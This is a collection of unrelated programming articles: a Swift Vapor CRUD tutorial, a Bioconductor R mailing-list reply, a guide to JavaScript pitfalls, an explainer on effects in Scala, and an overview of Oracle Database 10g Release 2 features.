Like Laravel, Vapor lets you create controllers and RESTful resources. But for this tutorial, we will just use Routes.swift and do all operations directly. First we make an index view; there should not be any surprises if you are used to Laravel:

builder.get { req in
    // Get all stations
    let stations = try Station.makeQuery().all()
    return try self.view.make("index", [
        "stations": stations
    ])
}

builder.get("station", ":id") { req in
    // Make sure the request contains an id
    guard let stationId = req.parameters["id"]?.int else {
        throw Abort.badRequest
    }
    let station = try Station.makeQuery().find(stationId)
    return try self.view.make("edit", [
        "station": station
    ])
}

builder.get("station", "create") { req in
    return try self.view.make("edit")
}

builder.post("station") { req in
    guard let form = req.formURLEncoded else {
        throw Abort.badRequest
    }
    let station = try Station(node: form)
    try station.save()
    return Response(redirect: "/")
}

Finally, we add a route for updating an existing record.
As mentioned earlier, Swift is strict, and simply refreshing the model from the form would require a lot of checks. Going via Vapor's Node package, creating a new model, and assigning its values back to the original record was the easiest way I found. If you have better solutions, feel free to let me know.

builder.post("station", ":id") { req in
    // Make sure it's a posted form
    guard let form = req.formURLEncoded else {
        throw Abort.badRequest
    }
    // Make sure the request contains an id
    guard let stationId = req.parameters["id"]?.int else {
        throw Abort.badRequest
    }
    guard let station = try Station.makeQuery().find(stationId) else {
        throw Abort.notFound
    }
    // Use Vapor's node functions to create a new entity
    let newStation = try Station(node: form)
    // Assign the new values back to the old
    station.country = newStation.country
    station.name = newStation.name
    station.description = newStation.description
    station.stream = newStation.stream
    // ...and save
    try station.save()
    return Response(redirect: "/")
}

A very nice feature of using Xcode is that you get all the debugging features you would expect from an IDE. Try putting a breakpoint on the route for getting a station, and you can inspect the results.

Overall, Vapor was a delightful surprise in that it feels very Laravel-ish; I am sure the developers of Vapor have looked a lot at Laravel. Using the same language for the backend and your apps will be a deal maker for many developers, especially if you are using Vapor as a RESTful backend. Vapor feels super snappy, the performance is incredible, and the memory footprint is very low.

Swift, by its nature of being strictly type hinted, makes some operations, like models, require a lot of boilerplate. This could be resolved by a code generator like Sourcery (GitHub - krzysztofzablocki/Sourcery: Meta-programming for Swift, stop writing boilerplate code). Unfortunately, there is no such tool for creating Vapor models yet. All of your edits also demand that everything is re-compiled. Apple has made tremendous efforts to make this more speedy.
Obviously, it's not as easy as saving your changes and hitting reload in the browser.

Will I change? If I am about to build a JSON backend for an iOS app, I will most likely look into Vapor. In some parts, I could even reuse the same code between the iOS app and the backend. For building a SAAS with a lot going on at the front end, I would for sure stay with Laravel, and maybe use Laravel Spark, because of the more mature tooling like components, seeding, Mix, Vue.js, and so forth.

2017-07-19

In this short example, we are going to build a simple CRUD app of the radio stations that are used in my tvOS app Radio Player. If you have never programmed in Swift, there are some things you need to know. Apple has designed Swift to be a statically type-safe language with static dispatch. There cannot be any loose ends at compile time; everything must add up. Why is this? Apple's motives are performance, low memory usage, and stability; bugs should be caught at compilation and not at runtime. Defaulting to structs and immutable variables is one example. Swift 3 has all the bells and whistles you would expect from modern languages, with influences from Rust, Haskell, Ruby, Python, and C#. With Swift 2.0, Apple also introduced Protocol-Oriented Programming in replacement of object-oriented programming. There are a lot of resources that can explain this better than I can.

The nature of the web is very stringy, and combining this with Swift's strict typing gives you a bit of a problem. Vapor tries to resolve this with a package called Node to help overcome the issue. Swift also lacks multi-line strings, which are planned for Swift 4. There are some quirks you are not used to coming from PHP; some operations demand a lot more boilerplate code than you are maybe used to. Swift features a very limited runtime and has no meta-programming features, which leads our projects to contain more boilerplate code. One solution to this could be a tool like Sourcery.
Unfortunately, there is no such tool yet. I think this is only the beginning.

Create a file in Model/Station.swift and create a class that extends Model, like this:

import Vapor
import MySQLProvider

final class Station: Model {
    // The storage property allows Fluent to store extra information on your
    // model -- things like the model's database id.
    let storage = Storage()

    var id: Node?
    var name: String
    var description: String
    var country: String
    var stream: String

    // Static variables holding the key names, to prevent typos
    static let nameKey = "name"
    static let descriptionKey = "description"
    static let countryKey = "country"
    static let streamKey = "stream"

    init(name: String, description: String, country: String, stream: String) {
        self.id = nil
        self.name = name
        self.description = description
        self.country = country
        self.stream = stream
    }

    // The Row struct represents a database row. Your models should be able to
    // parse from and serialize to database rows. Here's the code for parsing
    // Stations from the database.
    init(row: Row) throws {
        id = try row.get(Station.idKey)
        name = try row.get(Station.nameKey)
        description = try row.get(Station.descriptionKey)
        country = try row.get(Station.countryKey)
        stream = try row.get(Station.streamKey)
    }

    // Init the model from a Node structure
    init(node: Node) throws {
        name = try node.get(Station.nameKey)
        description = try node.get(Station.descriptionKey)
        country = try node.get(Station.countryKey)
        stream = try node.get(Station.streamKey)
    }

    func makeRow() throws -> Row {
        var row = Row()
        try row.set(Station.nameKey, name)
        try row.set(Station.descriptionKey, description)
        try row.set(Station.countryKey, country)
        try row.set(Station.streamKey, stream)
        return row
    }
}

We need to show Vapor how to save it back into the database, so we add a method called makeNode() with instructions. Just to make it more clear, we create an extension that conforms to the NodeRepresentable protocol.
Extensions can add new functionality to an existing class, structure, enumeration, or protocol type (see Interfaces vs Inheritance in Swift).

extension Station: NodeRepresentable {
    func makeNode(in context: Context?) throws -> Node {
        var node = Node(context)
        try node.set(Station.idKey, id?.int)
        try node.set(Station.nameKey, name)
        try node.set(Station.descriptionKey, description)
        try node.set(Station.countryKey, country)
        try node.set(Station.streamKey, stream)
        return node
    }
}

The cool thing is that protocols can be adopted by classes, structs, and enums, while base classes and inheritance are restricted to class types. You can decorate with default behaviors from multiple protocols. Unlike multiple inheritance of classes, which some programming languages support, protocol extensions do not introduce any additional state.

Finally, we have to make a migration, called a preparation in Vapor, for the model:

extension Station: Preparation {
    static func prepare(_ database: Database) throws {
        try database.create(self) { builder in
            builder.id()
            builder.string(Station.nameKey)
            builder.string(Station.descriptionKey)
            builder.string(Station.countryKey)
            builder.string(Station.streamKey)
        }
    }

    static func revert(_ database: Database) throws {
        try database.delete(self)
    }
}

Next, we are going to add the MySQL and Leaf providers to the droplet, as you would do in Laravel. In Source/App/Config+Setup.swift:

import LeafProvider
import MySQLProvider

extension Config {
    public func setup() throws {
        // Allow fuzzy conversions for these types
        // (add your own types here)
        Node.fuzzy = [JSON.self, Node.self]
        try setupProviders()
    }

    /// Configure providers
    private func setupProviders() throws {
        try addProvider(LeafProvider.Provider.self)
        try addProvider(MySQLProvider.Provider.self)
        // Run migrations, aka preparations
        preparations.append(Station.self)
    }
}

Open Sources/App/Routes.swift and add a route.
builder.get { req in
    return try Station.makeQuery().all().makeJSON()
}

Press the Run button in Xcode.
https://eastwest.se/blog
3 Jan 18:49 2013
Re: error message relating to png file when running maQualityPlots
Dan Tenenbaum <dtenenba@...>
2013-01-03 17:49:44 GMT

On Thu, Jan 3, 2013 at 8:37 AM, James W. MacDonald <jmacdon@...> wrote:
> I don't remember if Macs come ready to do png graphics or not, and a quick
> google doesn't clear it up for me.

In general, png is supported on the mac.

> So the first step I would take is to
> ensure that you have the capability to do so. Try typing
>
> capabilities()
>
> at an R prompt and see if there is a TRUE under png. If not, you can set the
> dev argument of maQualityPlots() to a device for which you have
> capabilities. If there is a TRUE under png, then you will need to furnish
> the actual code you are running (or better yet, a reproducible example,
> which implies that I or anybody else can try and replicate what you have
> done).

Yes, a reproducible example would be great. I am guessing that you are working your way through this code:

This uses packages which are obsolete so it's not surprising that you are getting errors.

Dan

> Best,
>
> Jim
>
> On 1/3/2013 11:15 AM, Yanqing Hu [guest] wrote:
>>
>> I'm using Rstudio on my Mac. When I ran the code maQualityPlots(beta7) in
>> Chapter 4 of Bioinformatics and Computational Biology Solutions Using R and
>> Bioconductor, I got the message "Error in plot.new() : could not open file
>> 'diagPlot.6Hs.195.1.png'". Does anyone know how to fix this problem? Thanks
>> a lot!
>>
>> -- output of
>> [7] base
>>
>> other attached packages:
>> [1] vsn_3.26.0 arrayQuality_1.36.0 beta7_1.0.4
>> [4] marray_1.36.0 cluster_1.14.2 BiocInstaller_1.8.2
>> [7] affycomp_1.34.0 affyPLM_1.34.0 preprocessCore_1.20.0
>> [10] gcrma_2.30.0 hgu133acdf_2.11.0 hgu95av2cdf_2.11.0
>> [13] AnnotationDbi_1.20.0 affydata_1.11.17 affy_1.36.0
>> [16] Biobase_2.18.0 BiocGenerics_0.4.0 class_7.3-5
>> [19] limma_3.14.3
>>
>> loaded via a namespace (and not attached):
>> [1] affyio_1.26.0 Biostrings_2.26.1 DBI_0.2-5
>> [4] grid_2.15.1 gridBase_0.4-5 hexbin_1.26.0
>> [7] IRanges_1.16.2 lattice_0.20-10 parallel_2.15.1
>> [10] RColorBrewer_1.0-5 RSQLite_0.11.2 splines_2.15.1
>> [13] stats4_2.15.1 tools_2.15.1 zlibbioc_1.4.0
>>
>> --
>> Sent via the guest posting facility at bioconductor.org.

_______________________________________________
Bioconductor mailing list
Bioconductor@...
Search the archives:
http://permalink.gmane.org/gmane.science.biology.informatics.conductor/45464
JavaScript common mistakes and tools

If you are writing JavaScript code, it is worth using code quality tools like JSLint and JSHint to avoid pitfalls like:

- using global variables
- leaving trailing commas in object declarations
- not understanding the difference between closures and functions
- forgetting to declare a var
- naming a variable with the same name as an HTML id, etc.

It is also essential to use JavaScript testing frameworks like Jasmine, Selenium + WebDriver, QUnit, and TestSwarm. QUnit is an easy-to-use JavaScript test suite that was developed by the jQuery project to test its code and plugins, but is capable of testing any generic JavaScript code. One of the challenges of a JavaScript-rich application is testing it for cross-browser compatibility. The primary goal of TestSwarm is to simplify the complicated and time-consuming process of running JavaScript test suites in multiple browsers. It provides all the tools necessary for creating a continuous integration workflow for your JavaScript-rich application.

Debugging JavaScript can be a painful part of web development. There are handy browser plugins, built-ins, and external tools to make your life easier. Here are a few such tools.
- Cross-browser (Firebug Lite, JS Shell, Fiddler, Blackbird Javascript Debug helper, NitobiBug, DOM Inspector (aka DOMi), Wireshark / Ethereal)
- Firefox (JavaScript Console, Firebug, Venkman, DOM Inspector, Web Developer Extension, Tamper Data, Fasterfox, etc)
- Internet Explorer (JavaScript Console, Microsoft Windows Script Debugger, Microsoft Script Editor, Visual Web Developer, Developer Toolbar, JScript Profiler, JavaScript Memory Leak Detector)
- Opera (JavaScript Console, Developer Console, DOM Snapshot, etc)
- Safari ("Debug" menu, JavaScript Console, Drosera - Webkit, etc)
- Google Chrome (JavaScript Console and Developer Tools)

Here is an example of global window scope versus a neatly packaged "name" variable and "greet" function in an object literal. You can also note that the value of 'this' is changed to the containing object, which is no longer the global "window" object. This is quite useful, as you can keep a set of variables and functions abstracted into one namespace without any potential conflicts of names.

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Insert title here</title>
<script type="text/javascript">
//bad - global variable and function on window
var name = "window-global-scope";
function greet() {
    console.log("hello " + this.name); // 'this' is the global window object
}

//good - "name" and "greet" packaged into an object literal
var object = {
    name: "object-scope",
    greet: function() {
        console.log("howdy " + this.name); // 'this' is the containing object
    }
};
</script>
</head>
<body onload="greet(); object.greet();">
</body>
</html>

Note: It is a best practice to define your HTML and JavaScript in separate files. The above code snippet is for illustration purposes only. The output will be:

hello window-global-scope
howdy object-scope

- The == operator compares the values of the operands, but it doesn't compare their data types.
- The === operator in JavaScript compares not only the value of the operands, but also their data type. If the data types of the operands are different, it will always return false.

5. Not understanding what the implicit scope "this" refers to.
For example,

function Account(balance) {
    this.balance = balance;
    this.getTenPercentOfbalance = function() {
        return this.balance * 0.10;
    };
}

var mortgageAccount = new Account(10000.00);
mortgageAccount.getTenPercentOfbalance(); // returns 1000.00

Now, if you try

var tenPercentMethod = mortgageAccount.getTenPercentOfbalance; // no parentheses: we get the function back
tenPercentMethod(); // does not work as hoped

Why not? When tenPercentMethod is invoked on its own, the implicit "this" points to the global Window object, and the Window object has no balance property, so the result is NaN (or a TypeError in strict mode). The above two lines can be written with the JavaScript head object 'window' as shown below.

window.tenPercentMethod = window.mortgageAccount.getTenPercentOfbalance;
window.tenPercentMethod(); // same problem

Important: The value of this, passed to all functions, is based on the context in which the function is called at runtime. You can fix this by

tenPercentMethod.apply(mortgageAccount); // now it uses this == mortgageAccount and returns 1000.00

When invoking constructors with the 'new' keyword, 'this' refers to the "object that is to be" when the constructor function is invoked using the new keyword. Had we not used the new keyword above, the value of this would be the context in which Account is invoked, in this case the 'window' head object.

var mortgageAccount = Account(10000.00); // without the new keyword, 'this' inside Account is 'window'
console.log(mortgageAccount.balance); // fails: Account returns nothing, so mortgageAccount is undefined; the value was actually set at window.balance

The good news is that ECMAScript 5's strict mode tightens this up: in a plain function call, this is undefined rather than the global object, so such mistakes fail fast.

Here is another example of the this reference and scope: In JavaScript, the value of this is resolved when a function is executed. If you have nested functions, a plain call to a function nested within a function loses your object context, and this defaults to the best thing it can get: window (i.e. global). To get your context back, JavaScript offers you two useful functions, call and apply.
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Insert title here</title>
<script type="text/javascript">
name = "window-global-scope"; // global, so it ends up on window

var object = {
    name: "object-scope",
    greet: function() {
        var nestedGreet = function(greeting) {
            console.log(greeting + " " + this.name);
        };
        //a plain call loses its scope and defaults to window
        nestedGreet('hello'); //hello window-global-scope
        nestedGreet.call(this, 'hello'); //hello object-scope
        nestedGreet.apply(this, ['hello']); //hello object-scope
    }
};
</script>
</head>
<body onload="object.greet()">
</body>
</html>

6. Not understanding the difference between getting a function back and invoking the function, especially when using callback functions. Callback functions are not invoked directly; they are invoked asynchronously, for example after an event like a button click or after a certain timeout.

function sayHello() {
    return "Hello caller";
}

Now, if you do the following, you only get the function back.

var varFunction = sayHello; // stores the function in the variable varFunction
setTimeout(sayHello, 1000); // can also pass it to other functions; this is a callback that will call sayHello a second later
window.onload = sayHello; // can attach it to objects; this callback will call sayHello when the page loads

But if you add '()' to it as shown below, you will actually be invoking the function.

sayHello(); //invokes the function
varFunction(); //invokes the function

So the addition of parentheses on the right invokes the function, and incorrectly assigning as shown below invokes the function immediately instead of registering a callback.

Wrong:

setTimeout(sayHello(), 1000); // won't wait for a second: sayHello runs immediately, and its return value is what gets scheduled

document.getElementById('mybutton').onclick = sayHello(); // invokes it straight away instead of waiting for the onclick event
Correct:

setTimeout(sayHello, 1000); // waits for a second

//jQuery to the rescue
$('#mybutton').click(function() {
    return "Hello caller";
});

So, it is a best practice to favor using proven JavaScript frameworks to avoid potential pitfalls.

7. Not understanding JavaScript scopes. JavaScript only has global and function scope; it does not have block scope as in other languages like Java. In JavaScript, functions are values that can be assigned to a variable, including arrays. In the example below, the correct code fragment uses a powerful feature of JavaScript known as first-class functions. In every iteration a variable item is declared that contains the current element from the array. The function that is generated on the fly contains a reference to "item" and will therefore be part of its closure. Logically, this means that the first function captures the value {'id': 'fname', 'help': 'Enter your first name'}, the second function captures the value {'id': 'lname', 'help': 'Enter your surname'}, and so on. The incorrect function is also shown to illustrate the difference.
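Stripped of the DOM, the difference between the two fragments can be reproduced with plain arrays of functions. This is my own reduction of the fname/lname example that follows (Node.js assumed; the helper names are made up):

```javascript
function makeHandlersWrongly(items) {
  var handlers = [];
  for (var i = 0; i < items.length; i++) {
    var item = items[i]; // 'var' is function-scoped: one shared variable
    handlers.push(function () {
      return item;       // every handler sees the final value of 'item'
    });
  }
  return handlers;
}

function makeHandlersCorrectly(items) {
  var handlers = [];
  for (var i = 0; i < items.length; i++) {
    var item = items[i];
    handlers.push((function (item) {
      // the immediately-invoked wrapper gives each handler its own 'item'
      return function () { return item; };
    })(item));
  }
  return handlers;
}

var ids = ["fname", "lname"];
console.log(makeHandlersWrongly(ids)[0]());   // "lname" -- the last item leaked in
console.log(makeHandlersCorrectly(ids)[0]()); // "fname" -- captured per iteration
```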
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Insert title here</title>
<script type="text/javascript">
function showHelp(help) {
    document.getElementById('help').innerHTML = help;
}

function initializeHelpWrongly() {
    var helpText = [
        {'id': 'fname', 'help': 'Enter your first name'},
        {'id': 'lname', 'help': 'Enter your surname'}
    ];
    for (var i = 0; i < helpText.length; i++) {
        var item = helpText[i];
        //Wrong: by the time this function is executed the for loop will have completed,
        //and the value of item will be the last item in the array, which is id: lname
        document.getElementById(item.id).onfocus = function() {
            console.log(item.help);
            showHelp(item.help);
        };
    }
}

function initializeHelpCorrectly() {
    var helpText = [
        {'id': 'fname', 'help': 'Enter your first name'},
        {'id': 'lname', 'help': 'Enter your surname'}
    ];
    for (var i = 0; i < helpText.length; i++) {
        var item = helpText[i];
        //In every iteration a new function is created on the fly, which contains
        //a reference to the current item being processed in the loop
        //and will therefore be part of its closure. Logically, this means that the
        //first function captures id: fname, the second captures id: lname, and so on.
        document.getElementById(item.id).onfocus = (function(item) {
            return function() {
                console.log(item.help);
                showHelp(item.help);
            };
        })(item);
    }
}
</script>
</head>
<!-- try substituting initializeHelpWrongly() -->
<body onload="initializeHelpCorrectly();">
<p id="help">Help text appears here</p>
<p>fname: <input type="text" id="fname" name="fname"></p>
<p>lname: <input type="text" id="lname" name="lname"></p>
</body>
</html>

8. Not testing the JavaScript code for cross-browser compatibility.

9. Trying to reinvent the wheel by writing substandard functions as opposed to reusing functions from proven frameworks and libraries.
for (var i = 0, len = items.length; i < len; i++) {
    (function(item) {
        setTimeout(function() {
            processItem(item);
        }, 5);
    })(items[i]);
}

Note: With a bare processItem(items[i]) inside the callback, this loop would hit the same closure pitfall as item 7 (by the time the timeouts fire, i equals len), so the current item is passed through an immediately-invoked wrapper. The above code can be further improved with a queue, dynamic batch sizes, and eliminating the need for a for loop.

Labels: JavaScript
http://java-success.blogspot.com.au/2012/07/
When you get started with functional programming (FP) a common question you’ll have is, “What is an effect in functional programming?” You’ll hear advanced FPers use the words effects and effectful, but it can be hard to find a definition of what these terms mean.

Effects are related to monads

A first step in the process of understanding effects is to say that they’re related to monads, so you have to know a wee bit about monads to understand effects. As I wrote in my book, Functional Programming, Simplified, a slight simplification is to say that in Scala, a monad is any class that implements the map and flatMap methods. Because of the way Scala for-expressions work, implementing those two methods lets instances of that class be chained together in for-expressions (for/yield expressions). (If you thought understanding monads was hard, I hope that helps to make them easier to understand.)

The benefit of monads

That leads to the benefit of monads in Scala: they let you sequence a series of operations together. For example, if every function returns an Option, you can sequence the functions together in a for-expression:

def fInt(): Some[Int] = Some(1)
def fDouble(): Some[Double] = Some(1.0)
def fString(): Some[String] = Some("alvin")

val x = for {
  a <- fInt()
  b <- fDouble()
  c <- fString()
} yield (a,b,c)
// x: Option[(Int, Double, String)] = Some((1,1.0,alvin))

Indeed, when people use the term monadic in Scala you can typically replace the word “monadic” with “in a for-expression.”

Summary: Step 1 is knowing that a monad in Scala is simply a class that implements map and flatMap so it can be used in a for-expression. (That’s a slight over-simplification, but it’s good enough for now.)
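As a cross-language aside (my addition, not part of the original article): the map/flatMap sequencing that the for-expression above desugars into can be sketched with a toy Maybe in JavaScript. This is only an analogy; none of it is Scala's actual Option API.

```javascript
// A toy Maybe with just map and flatMap -- enough to sequence computations,
// which is exactly what a Scala for-expression desugars into.
function Some(value) { return { isSome: true, value: value }; }
var None = { isSome: false };

function map(m, f)     { return m.isSome ? Some(f(m.value)) : None; }
function flatMap(m, f) { return m.isSome ? f(m.value) : None; }

function fInt()    { return Some(1); }
function fString() { return Some("alvin"); }

// for { a <- fInt(); c <- fString() } yield (a, c), written out by hand:
var x = flatMap(fInt(), function (a) {
  return map(fString(), function (c) {
    return [a, c];
  });
});
// x is Some([1, "alvin"]); had any step returned None, x would be None
```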
Not a side effect, but the main effect

Now that we know that we’re talking about monads, the next important part is to understand the meaning of the word “effect.” A good way to describe this is to say that we’re not talking about a side effect; instead we’re talking about a main effect, i.e., the main purpose of each individual monad. An effect is what the monad handles. This first became clear when I read the book, Functional and Reactive Domain Modeling, and came across these statements:

- Option models the effect of optionality
- Future models latency as an effect
- Try abstracts the effect of failures (manages exceptions as effects)

Those statements can also be written like this:

- Option is a monad that models the effect of optionality (of something being optional)
- Future is a monad that models latency as an effect
- Try is a monad that models the effect of failures (manages exceptions as effects)

Similarly:

- Reader is a monad that models the effect of composing operations that depend on some input
- Writer is a monad that models logging as an effect
- State is a monad that models the effect of state (composing a series of computations that maintain state)

So again, an effect is the thing a monad handles. In terms of code, it’s how a monad implements its flatMap method to achieve that effect. Note: In Haskell, the equivalent of the flatMap method is known as bind.

Effectful functions return F[A] rather than A

In a YouTube video titled, Functional Programming with Effects, Rob Norris makes an interesting point: he says that an effectful function is a function that returns F[A] rather than A.
For example, this function returns Option[Int] rather than Int:

def toInt(s: String): Option[Int] = {
    try {
        Some(Integer.parseInt(s.trim))
    } catch {
        case e: Exception => None
    }
}

In creating toInt you could write a function that returns Int, but the only ways to do that are:

- Return 0 if the conversion fails, or
- Return null if the conversion fails

Regarding the first case, this is a bad idea because users will never know if the function received "0" or something like "fred" that won’t convert to a number. Regarding the second case, using null is a bad practice in both OOP and FP, so that approach is just a bad idea. Therefore, it occurs to you that a logical thing to do is to return an Option from toInt. Option lets you handle the possible return values from toInt:

- Some[Int] if toInt succeeds
- None if the toInt conversion fails

This is what it means when we say, “Option is a monad that models the effect of optionality,” and it’s also what Mr. Norris means when he says that an effectful function returns F[A] rather than A. In the toInt example:

- F[A] is Option[Int]
- A is the raw Int type

Now, because toInt is effectful (meaning that it returns an F[A], which is a monadic type), it can be used in for-expressions like this:

val x = for {
    a <- toInt(string1)
    b <- toInt(string2)
    c <- toInt(string3)
} yield (a + b + c)

The result of this expression is that x will be a Some[Int] or a None. For some reason my brain has a hard time absorbing the words effect and effectful when people talk about things abstractly, so I decided to dig into this topic and then share my notes here. I hope you find them helpful as well.
As mentioned, rather than thinking of a side effect, an effect is the main effect of a monad that you’re using:

- Option is a monad that models the effect of optionality
- Future is a monad that models latency as an effect
- Try is a monad that models the effect of failures (manages exceptions as effects)
- Reader is a monad that models the effect of composing operations that depend on some input
- Writer is a monad that models logging as an effect
- State is a monad that models the effect of state (composing a series of computations that maintain state)

Furthermore, when a function is said to be effectful, it simply means that the function is returning a monad, i.e., some type F[A] rather than the raw type A.

Notes

In my programming life I need to move on to other topics, so I wrote this post quickly. It would be more effective if I showed you how to write flatMap and map functions in a monad, but I already did that in Functional Programming, Simplified, so I won’t repeat that here. A few other notes:

- I oversimplified the definition of monad in that discussion. There are formal rules about monads that are important, and I discuss those in Functional Programming, Simplified. But a useful simplification is that any class that implements map is a functor, and any class that further implements flatMap (in addition to map) is a monad.
- In the preceding discussion I used Option for my examples, but you can also use instances of Try or Either, if you prefer.
- I could have written toInt shorter (as shown below) but I wanted to clearly show the Option/Some/None types in the function body:

def toInt(s: String): Option[Int] =
    Try(Integer.parseInt(s.trim)).toOption
https://alvinalexander.com/scala/what-effects-effectful-mean-in-functional-programming/
My First Day with the New Release

By Tom Kyte

Our technologist talks about his first experience with Oracle Database 10g Release 2.

Can you tell us about your experience with Oracle Database 10g Release 2 and point out some of the important new features?

First, this column will not even attempt to cover everything new under the sun with Oracle Database 10g Release 2; that would be an impossible task in just a few pages. For the entire story, see the Oracle Database 10g Release 2 New Features Guide (see Next Steps). Rather, what you'll see here are some of the things I noticed and felt deserved pointing out.

Autotrace

In my first couple of minutes using Oracle Database 10g Release 2, I immediately found this improvement to Autotrace, shown in Listing 1. Autotrace is now using the DBMS_XPLAN package to display the explain plans. This gives us a much more detailed explain plan than in previous releases. We could have gotten this plan in Oracle9i Database Release 2 and above using the supplied DBMS_XPLAN package, but having Autotrace use DBMS_XPLAN for us just makes it so much easier. Of particular note in the DBMS_XPLAN output is the addition of the predicates to the bottom of the plan, showing at exactly which step Oracle Database is applying them. This is great.
Code Listing 1: Autotrace with DBMS_XPLAN

SQL> set autotrace traceonly explain
SQL> select *
  2  from emp, dept
  3  where emp.deptno = dept.deptno
  4  and emp.job = 'CLERK';

Execution Plan
------------------------------------------------------------------
Plan hash value: 877088642

------------------------------------------------------------------------------
| Id  | Operation           | Name | Rows | Bytes | Cost (%CPU) | Time     |
------------------------------------------------------------------------------
|   0 | SELECT STATEMENT    |      |    4 |   468 |      7 (15) | 00:00:01 |
|*  1 |  HASH JOIN          |      |    4 |   468 |      7 (15) | 00:00:01 |
|*  2 |   TABLE ACCESS FULL | EMP  |    4 |   348 |      3  (0) | 00:00:01 |
|   3 |   TABLE ACCESS FULL | DEPT |    4 |   120 |      3  (0) | 00:00:01 |
------------------------------------------------------------------------------

Predicate Information (identified by operation id):
---------------------------------------------------
   1 - access("EMP"."DEPTNO"="DEPT"."DEPTNO")
   2 - filter("EMP"."JOB"='CLERK')

Note
-----
   - dynamic sampling used for this statement

Conditional Compilation

PL/SQL has lots of new stuff. The first thing I noticed was conditional compilation, something I missed from my days as a C programmer. Conditional compilation is the ability to make the compiler effectively ignore code (or not) at will. It may not sound too useful at first, but it is. Listing 2 shows a quick view of what conditional compilation implies and how it works.

Code Listing 2: Conditional PL/SQL compilation example

SQL> create or replace procedure p
  2  as
  3  begin
  4  $IF $$debug_code $THEN
  5      dbms_output.put_line( 'Our debug code' );
  6      dbms_output.put_line( 'Would go here' );
  7  $END
  8      dbms_output.put_line( 'And our real code here' );
  9  end;
 10  /

Procedure created.
Notice how the "debug" code is not printed and the code compiles without the $$debug_code value being defined.

SQL> exec p
And our real code here

PL/SQL procedure successfully completed.

By simply enabling the debug_code variable, we can enable that debug code. Note that "debug_code" is my name, not a special name; you can define your own variables at will.

SQL> alter procedure P compile
  2  plsql_ccflags = 'debug_code:true' reuse settings;

Procedure altered.

SQL> exec p
Our debug code
Would go here
And our real code here

PL/SQL procedure successfully completed.

DBMS_OUTPUT

DBMS_OUTPUT has been upgraded in Oracle Database 10g Release 2. Not only can you specify a buffer size of unlimited (no more 1,000,000-byte limit!), but you can also print lines much larger than 255 characters. The line length limit is now 32K. The following demonstrates the DBMS_OUTPUT upgrade:

SQL> set serveroutput on -
   > size unlimited
SQL> begin
  2      dbms_output.put_line
  3      ( rpad('*',2000,'*') );
  4  end;
  5  /
************************
...
************************

PL/SQL procedure successfully completed.

Oracle Fast-Start Failover

Another new capability in Oracle Database 10g Release 2 is automatic failover to a standby database. Instead of a human being running a sequence of commands or pushing a button, Oracle Data Guard can now automatically fail over to the standby database upon failure of the production site, storage, or network.

Database Transports

Oracle Database 10g Release 1 introduced the cross-platform transportable tablespace, but Oracle Database 10g Release 2 takes it to the next level. Now you can transport an entire database across platforms that share the same endianness (byte ordering). That means you can move an entire database (not just transport individual tablespaces) from Apple Macintosh to HP-UX or from Solaris x86 to OpenVMS. No more dump and reload.
Data Pump Compression

When Oracle Database 10g Release 1 came out, the good news was that the export (EXP) and import (IMP) utilities had been totally rewritten, and the new Oracle Data Pump utilities EXPDP and IMPDP were introduced. One downside of the EXPDP and IMPDP tools was that compressing the DMP files during the export process was impossible. With EXPDP, you had to create the DMP file and then compress it, unlike the process with the older EXP tool, which you could tell to write to a named pipe, where the data written to the named pipe could be compressed, all in one step. Fortunately, Oracle Database 10g Release 2 makes it easier to create and partially compress DMP files than the old tools ever did. EXPDP itself will now compress all metadata written to the dump file and IMPDP will decompress it automatically; no more messing around at the operating system level. And Oracle Database 10g Release 2 gives Oracle Database on Windows the ability to partially compress DMP files on the fly for the first time (named pipes are a feature of UNIX/Linux).

Asynchronous Commit

Normally when a Java, C, or Visual Basic application issues a COMMIT, that causes a wait, specifically a log file sync wait. This wait is due to the client waiting for the log writer process to flush the redo to disk, to make the transaction permanent. Normally this is exactly what you want to have happen. When you COMMIT, it should be permanent. However, there are exceptions to all rules. What about a system that is processing incoming records as fast as possible, perhaps from a sensor or a network feed? This program's goal in life is to batch up a couple of records, INSERT them, COMMIT them (to make them visible), and continue on. It doesn't really care to wait for the COMMIT to complete; in fact, by waiting, this program is not running as fast as it can. Enter the asynchronous COMMIT in Oracle Database 10g Release 2. We can now say "commit, but don't wait" or "commit, and please do wait."
If you use the commit-but-don't-wait mode, however, you must be prepared at some point in the future to have data that was "committed" be lost. If you commit but don't wait and the system fails, that data may not have been committed. Only you can decide whether this is acceptable to you. But there are many classes of applications, including high-speed data ingest programs whose only goal is to get the stream of data into the database, where commit-but-don't-wait is not only acceptable but very desirable performancewise. As a small example, I wrote the Java routine in Listing 3.

Code Listing 3: Commit but don't wait (asynchronous commit)

import java.sql.*;

public class instest {
    static public void main(String args[]) throws Exception {
        DriverManager.registerDriver(new oracle.jdbc.driver.OracleDriver());
        Connection conn = DriverManager.getConnection
            ("jdbc:oracle:thin:@desktop:1521:ora10gr2", "scott", "tiger");
        conn.setAutoCommit( false );
        Statement sql_trace = conn.createStatement();
        sql_trace.execute( "truncate table t" );
        System.out.println( "Table truncated" );
        sql_trace.execute
            ( "begin " +
              "    dbms_monitor.session_trace_enable( WAITS=>TRUE );" +
              "end;" );
        // create table t(x char(2000))
        // create index t_idx on t(x)
        PreparedStatement pstmt = conn.prepareStatement
            ("insert into t(x) values(?)" );
        pstmt.setString( 1, "x" );
        PreparedStatement commit = conn.prepareStatement
            ("commit work write batch nowait");
         // ("commit work write immediate wait");
        for( int i = 0; i < 1000; i++ ) {
            pstmt.executeUpdate();
            commit.executeUpdate();
        }
        conn.close();
    }
}

Note how the COMMIT statement I'm using in Listing 3 is either COMMIT WORK WRITE BATCH NOWAIT or COMMIT WORK WRITE IMMEDIATE WAIT. The former is the new feature; it shows how to COMMIT without waiting for the COMMIT to be finalized. The latter is the way it has historically happened.
When I ran the test program in Listing 3 (the CREATE TABLE is a comment before the INSERT statement for reference), I observed a lot of time spent waiting for log file sync waits when using the WAIT option and virtually no time spent waiting with the NOWAIT option. The results are shown in Listing 4.

Code Listing 4: Comparing WAIT and NOWAIT results

Event Waited On          Times Waited    Max. Wait    Total Waited
----------------------   ------------    ---------    ------------
log file sync (nowait)             19         0.02            0.04
log file sync (wait)             1017         0.04            1.43

This will make a measurable difference in high-speed data load programs that need to COMMIT periodically during the load.

Transparent Data Encryption

